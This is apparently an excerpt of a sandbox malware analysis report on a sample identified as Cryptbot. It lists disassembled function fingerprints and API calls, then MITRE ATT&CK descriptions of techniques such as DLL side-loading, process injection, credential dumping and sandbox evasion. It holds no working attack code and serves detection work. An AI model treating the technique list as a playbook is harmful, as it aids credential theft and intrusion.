Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 45b617349f508d0e92e1a4a520bd6d88158624f4b1e574eb460957bde988bf38
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: C1412B71A04616CBDB20CF59C4D4796B7E2AF88704B29C399DC889F34AD372DC42CB90

Function 6C9D4B80 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9D4BBA
strlen.MSVCRT ref: 6C9D4C3D
strlen.MSVCRT ref: 6C9D4CC0
strlen.MSVCRT ref: 6C9D4D43

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 28427a6c1971a471dac02ebdda10edbe22d2c4c19131c97fd2f8341114c6f9c6
Instruction ID: 20a05a9c4e27da41783efa5b9e95ba2a051a9fdaf25d743178126b45a306d5f7
Opcode Fuzzy Hash: 28427a6c1971a471dac02ebdda10edbe22d2c4c19131c97fd2f8341114c6f9c6
Instruction Fuzzy Hash: 41E14674A04A458FCB00DF6DC1C4AAEBBF1BF44314B118A69E855EBB54DB34E90ACF91

Function 6C9D4380 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9D43BA
strlen.MSVCRT ref: 6C9D443D
strlen.MSVCRT ref: 6C9D44C0
strlen.MSVCRT ref: 6C9D4543

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: ac8d9a63264029bd7d7d5f3dcd99eeacf1b00a6c193d3fe2285a327e1b9e08cc
Instruction ID: 78e53a2cc0e117c6eaabb07d36a2ca0d7eae2f5e5ae94005666ff15a934a89d6
Opcode Fuzzy Hash: ac8d9a63264029bd7d7d5f3dcd99eeacf1b00a6c193d3fe2285a327e1b9e08cc
Instruction Fuzzy Hash: 23E16774A04A458FCB00DF6DC1C09AEBBF1BF45314B118A69E855EBB54DB34E946CF81

Function 6C95DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C95DFAE
strlen.MSVCRT ref: 6C95DFC1

Strings

basic_string: construction from null is not valid, xrefs: 6C95DFE3

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: a57f1cc45807a9a4d959e17a5bc6f58c8af961d1f03369fec3ea636d210e3c5c
Instruction ID: 63f4113a5e407f455dcc4f8e023808bbbd8c767bb9fa17f6bb4bb8b01e10a1e9
Opcode Fuzzy Hash: a57f1cc45807a9a4d959e17a5bc6f58c8af961d1f03369fec3ea636d210e3c5c
Instruction Fuzzy Hash: D8115472A182008F8704FF3DC94545BB7F5AB99314F85CA69D89487704E639D8298BB3

Function 6C953616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C953567
fputc.MSVCRT ref: 6C9535D7
memset.MSVCRT ref: 6C953692

Strings

o, xrefs: 6C95362E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 216fd3f17cbf8b91305956bf29d7062592f7eb6493c6cccf8bce1a945f5b878a
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: BF319A72A08305CFCB00CF38C1807A9BBF5BF48340F958629D989ABB05E734E916CB40

Function 00662F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00662E97
fputc.MSVCRT ref: 00662F07
memset.MSVCRT ref: 00662FC2

Strings

o, xrefs: 00662F5E

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 4a9296274802af5589e132fade8ef70b0d26a451efb7e25213b8ddf9c4828c39
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 61312C71904A06CFCB10CF68C1A479AFBF2BF58340F158A69D9899B702E735ED45CB94

Function 6C953AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C953A5F
fputc.MSVCRT ref: 6C953AC1

Strings

@, xrefs: 6C953AFA

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 9ce27fd3321b055f2102199777863d5fc90f4c4b9d54b0521300b370caccfd13
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: B2112BB9A052008BCB01CF38C180799BBF5BF49308FA58659ED996FB4AD334E821CB54

Function 00663424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0066338F
fputc.MSVCRT ref: 006633F1

Strings

@, xrefs: 0066342A

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: a2484b04872d75799d20431bbf37435145f3d9b47a11439c7f91f8bf268c8a83
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 93113AB1A042608BCB14CF28C1807997BE3BF55304F258658ED89AF34ADB35ED01CB44

Function 006618B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0066191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 006618FF
Unknown error, xrefs: 006618B2

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 08d3cc75adf2d4c0dd738b9b9130364f14a883a8c532e8450d7b30958999f355
Instruction ID: 7af24b73af60bc5d6dc92cd86b0246e8042bb44bbf715f42f9b2f9cf8e339e9b
Opcode Fuzzy Hash: 08d3cc75adf2d4c0dd738b9b9130364f14a883a8c532e8450d7b30958999f355
Instruction Fuzzy Hash: 9E01C470408B45CBD740AF15E48841AFFF2FF8A350F464C9CE5C446269CB32D8A8CB46

Function 6C967561 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C967583

Part of subcall function 6C9B3E00: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C967596), ref: 6C9B3E63

strlen.MSVCRT ref: 6C9675F4
strlen.MSVCRT ref: 6C967662
strlen.MSVCRT ref: 6C9676D6

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 130ba15aa84ce7a47114d55dd2c43e902a802956617197f332497d93d17f27a4
Instruction ID: dcdeadf2068919a69ddb3bef9b0abe5b4f7b397b509d7deb31ba37e7a5670cc6
Opcode Fuzzy Hash: 130ba15aa84ce7a47114d55dd2c43e902a802956617197f332497d93d17f27a4
Instruction Fuzzy Hash: 985149B4A05A118FDB01EF29C09865DFBF6BF95304F4585ADD845AF764CB34E80ACB82

Function 6C958080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C9581A1), ref: 6C9580A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C9581A1), ref: 6C9580E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C9581A1), ref: 6C9580F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C9581A1), ref: 6C958118

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 600a07deb0d3f95d29ca6b8ae37086ca431d7160a244852b699f610d0fac08c7
Instruction ID: 7abce794777b08d1dd264d25c73a4ecd97e13b41009ae6984e8c872a59279beb
Opcode Fuzzy Hash: 600a07deb0d3f95d29ca6b8ae37086ca431d7160a244852b699f610d0fac08c7
Instruction Fuzzy Hash: 4F11A1B1676201CBDF08FB3D95C62BA77F8EB06314F914926C452C3A04E631D8A5C797

Function 00666B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00666C81,?,?,?,?,?,?,00000000,00664F24), ref: 00666B87
InitializeCriticalSection.KERNEL32(?,?,?,?,00666C81,?,?,?,?,?,?,00000000,00664F24), ref: 00666BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,00666C81,?,?,?,?,?,?,00000000,00664F24), ref: 00666BD0
EnterCriticalSection.KERNEL32(?,?,?,?,00666C81,?,?,?,?,?,?,00000000,00664F24), ref: 00666BF8

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 959f68a00d3bf86ecf7b31b8cbd0cceb93ea62f3ce71963d40609387e7919985
Instruction ID: eab5138c66b47ace253dddba31b4cf46a5c4e0c9703f191abeb33226fcef9b4f
Opcode Fuzzy Hash: 959f68a00d3bf86ecf7b31b8cbd0cceb93ea62f3ce71963d40609387e7919985
Instruction Fuzzy Hash: 93112DB5A0C2408BDB10BB7DF9C51AA7BE7EB01348F150929E482C7314E7B1E8A4C7D6

Function 6C94AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C94AB5E
TlsGetValue.KERNEL32 ref: 6C94AB85
GetLastError.KERNEL32 ref: 6C94AB8C
LeaveCriticalSection.KERNEL32 ref: 6C94ABAC

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 811134528d38151531a259bd5bfc15a6296507673d3e455f5154468d9b1645cf
Instruction ID: 4902c93c9adc656186f4fb5dbfa4909025ab8e1f4578332e64829143a99158df
Opcode Fuzzy Hash: 811134528d38151531a259bd5bfc15a6296507673d3e455f5154468d9b1645cf
Instruction Fuzzy Hash: D8F0A9726003028FDB007F7AD5C591B7B78EA45754F068278DD4487704E630E545C7A3

Function 00662000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,006621D3,?,?,?,?,?,006617E8), ref: 0066200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,006621D3,?,?,?,?,?,006617E8), ref: 00662035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,006621D3,?,?,?,?,?,006617E8), ref: 0066203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,006621D3,?,?,?,?,?,006617E8), ref: 0066205C

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: f82ecfb78eb454bc1047db387169839fdaef4ae49f2ebda0d71e09e7786bde2d
Instruction ID: b138e4433787f100256df7df292cae68601a11382f333f864ad598c6f510c05e
Opcode Fuzzy Hash: f82ecfb78eb454bc1047db387169839fdaef4ae49f2ebda0d71e09e7786bde2d
Instruction Fuzzy Hash: A4F0A479A007019FDB10BF78D88451ABBA5EB15340F050528DD444B314E771E806CBA2

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

